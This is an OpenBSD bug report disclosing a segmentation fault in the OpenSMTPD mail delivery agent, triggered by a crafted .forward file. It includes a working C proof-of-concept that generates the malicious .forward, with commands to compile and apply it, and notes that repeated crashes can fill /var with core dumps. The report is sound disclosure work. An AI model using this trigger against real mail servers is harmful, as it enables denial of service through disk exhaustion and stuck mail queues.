>Synopsis: segmentation fault in opensmtpd mda >Category: system >Environment: System : OpenBSD 7.2 Details : OpenBSD 7.2 (GENERIC.MP) #2: Thu Nov 24 23:53:03 MST 2022 r...@syspatch-72-arm64.openbsd.org:/usr/src/sys/arch/arm64/compile/GENERIC.MP
Architecture: OpenBSD.arm64 Machine : arm64 >Description: I would have waited another week after contacting Gilles at his address and at his openbsd.org address last week, but we're out of -beta and I'd like to see this addressed before release. It may already be too late though. I've found a way to crash the mda that is forked from opensmtpd before the exec. It is a specially crafted .forward file that does this. In the worst case scenario it will fill up /var with smtpd.core's when the kern.nosuidcoredump sysctl is set to 3. The queue files are stuck in queue and have to be removed either with smtpctl remove or until they time out. A lot of these could fill /var with corefiles quicker. >How-To-Repeat: Here is the "exploit" code that I stuck into my .forward, I also gave this to Gilles. #include <sys/types.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define FBUF (4 * 1024) int main(void) { char buf[FBUF]; char *p = &buf[0]; memset(&buf, '/', sizeof(buf)); for (int j = 0; j < 3; j++) { for (int i = 0; i < 8; i++) { if (i == 0) { memcpy(p, "\"|", 2); p += 2; } if (i == 7) { memcpy(p, "%{mda[0:125]:raw|", 17); p += 125; } else { memcpy(p, "%{mda[0:127]:raw|", 17); p += 127; } *p++ = '}'; } *p++ = '"'; if (j == 0) break; *p++ = ','; } write(STDOUT_FILENO, buf, p - buf); exit (0); } You would apply this with cc -g -o makeforward makeforward.c and then fill the .forward with ./makeforward > ~/.forward >>> Please do not try this out on your account, make a test account <<< >Fix: I think some struct envelopes need to be memset to 0's (zeroized). But where exactly that is I don't know. dmesg: see earlier messages